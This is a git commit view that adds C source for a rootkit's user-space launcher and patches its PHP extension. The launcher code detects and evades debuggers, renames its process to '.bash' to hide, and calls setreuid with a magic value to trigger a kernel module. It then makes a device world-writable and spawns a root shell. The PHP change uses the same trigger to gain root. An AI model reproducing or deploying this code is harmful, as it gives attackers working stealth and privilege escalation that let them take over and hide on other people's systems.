Browse Source

Default

master
Root 5 years ago
parent
commit
f526553ad5
  1. 95
      rkbin/src/main.c
  2. 5
      rkphp/src/php_funcs.c

95
rkbin/src/main.c

@ -0,0 +1,95 @@ @@ -0,0 +1,95 @@
#define _GNU_SOURCE
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/ptrace.h>
#include "config.h"
#define SPC_DEBUGGER_PRESENT (num_traps == 0)
/**TRAP-DETECT-FUNCTIONS********************/
static int num_traps = 0;
static void dbg_trap(int signo)
{
num_traps++;
}
int spc_trap_detect(void)
{
if(signal(SIGTRAP, dbg_trap) == SIG_ERR)
return 0;
raise(SIGTRAP);
return 1;
}
/**TRAP-DETECT-FUNCTIONS********************/
int main(int argc, char *argv[])
{
int i;
char orig_argv0[512];
/** DETECT DEBUG/TRAPS **/
spc_trap_detect();
for(i = 0; i < 10; i++)
if(SPC_DEBUGGER_PRESENT)
return 0;
if(getenv("LD_PRELOAD"))
return 0;
if(ptrace(PTRACE_TRACEME, 0, 0, 0) < 0)
return 0;
/** DETECT DEBUG/TRAPS **/
setsid();
chdir("/");
//signal(SIGPIPE, SIG_IGN);
printf(
" \n"
" |----------------------------------\\ \n"
" | RRRR 000 k t |x\\ \n"
" | R R 0 00 k k ii t |xx\\\n"
" | RRRR 0 0 0 *** rrr kk ttt |xx|\n"
" | R R 00 0 r k k ii t |xx|\n"
" | R RR 000 r k k ii tt |xx|\n"
" \\---------------------------------|xx|\n"
" \\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|\n"
" \\-----------------------------------\n\n"
);
/** REWRITE PROC NAME **/
strncpy(orig_argv0, argv[0], strlen(argv[0]));
if(strlen(orig_argv0) > 0)
{
int i;
char *newargv = ".bash";
for(i = 0; argv[0][i] != 0; i++)
argv[0][i] = 0;
strncpy(argv[0], newargv, strlen(newargv));
if(strstr(argv[0], orig_argv0) == NULL)
printf("main: Rewrote Proc Name from %s to %s!\n", orig_argv0, argv[0]);
else
printf("main: Unable to rewrite Proc Name from %s to %s!\n", orig_argv0, newargv);
}
/** REWRITE PROC NAME **/
// With this I give you root!
setreuid(1337, 1337);
// Lets hope it's working, so /dev/DEVICE_NAME == chmod 0666
chmod("/dev/" DEVICE_NAME, 0666);
// Spawn hopefully our root shell!
system("/bin/bash");
return 0;
}

5
rkphp/src/php_funcs.c

@ -1,4 +1,5 @@ @@ -1,4 +1,5 @@
#include <stdio.h>
#include <unistd.h>
#include "common.h"
@ -42,11 +43,11 @@ PHP_FUNCTION(rkphp_ex) @@ -42,11 +43,11 @@ PHP_FUNCTION(rkphp_ex)
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
setreuid(1337, 1337);
/* This is where we'll attempt to interact with the kernel rkmod */
RKPHP_PRINTF("[*] Gained Root privileges successfully.\n");
RETURN_NULL();
RETURN_TRUE;
}
/* }}} */

Loading…
Cancel
Save